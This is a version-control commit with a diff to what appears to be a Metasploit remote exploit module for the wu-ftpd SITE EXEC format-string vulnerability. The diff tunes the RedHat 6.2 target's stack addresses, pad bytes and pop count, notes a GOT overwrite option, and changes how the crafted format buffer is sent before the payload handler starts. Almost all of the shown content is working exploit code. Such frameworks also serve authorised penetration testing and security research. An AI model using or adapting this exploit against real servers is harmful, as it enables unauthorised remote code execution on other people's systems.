finish and test target for redhat 6.2

git-svn-id: file:///home/svn/framework3/trunk@7765 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/multi/ftp/wuftpd_site_exec_format.rb

@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						'FlowHook'	=> 0xbffff1e4		# stack return addr
 					}
 				],
-				# these aren't vulnerable (using built-in, stripped down vsprintf)
+				# these aren't exploitable (using built-in, stripped down vsprintf, no %n)
 				#[	'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',
 				#[	'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',
 				#[	'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',
@@ -76,8 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote
 						'UseDPA' 	=> true,
 						'PadBytes'	=> 2,
 						'NumPops' 	=> 276,
-						'Writable' 	=> 0xbfffd026, 	# stack, avoid badchars
+						'Writable' 	=> 0xbfff0426, 	# stack, avoid badchars
 						'FlowHook'	=> 0xbfffb028		# stack return addr
+						#'FlowHook'  => 0x806e1e0		# GOT of sprintf
 					}
 				],
 				
@@ -216,7 +217,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			ret = mytarget['FlowHook']
 		end
 		
-		sleep(5)
+		#print_status("ATTACH!")
+		#sleep(5)
 		
 		print_status("Number of pad bytes: #{num_pad}")
 		print_status("Number of pops: #{num_pops}")
@@ -255,9 +257,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		# a space allows the next part to start with a '/'
 		fmtbuf[num_pad-1,1] = " "
 		fmtbuf.gsub!(/\xff/, "\xff\xff")
-		if (res = send_cmd(['SITE', 'EXEC', fmtbuf], true))
-			print_status(res.strip)
-		end
+		# don't wait for the response here :)
+		res = send_cmd(['SITE', 'EXEC', fmtbuf], false)
+		select(nil, nil, nil, 1.5)
 		
 		print_status("Your payload should have executed now...")
 		handler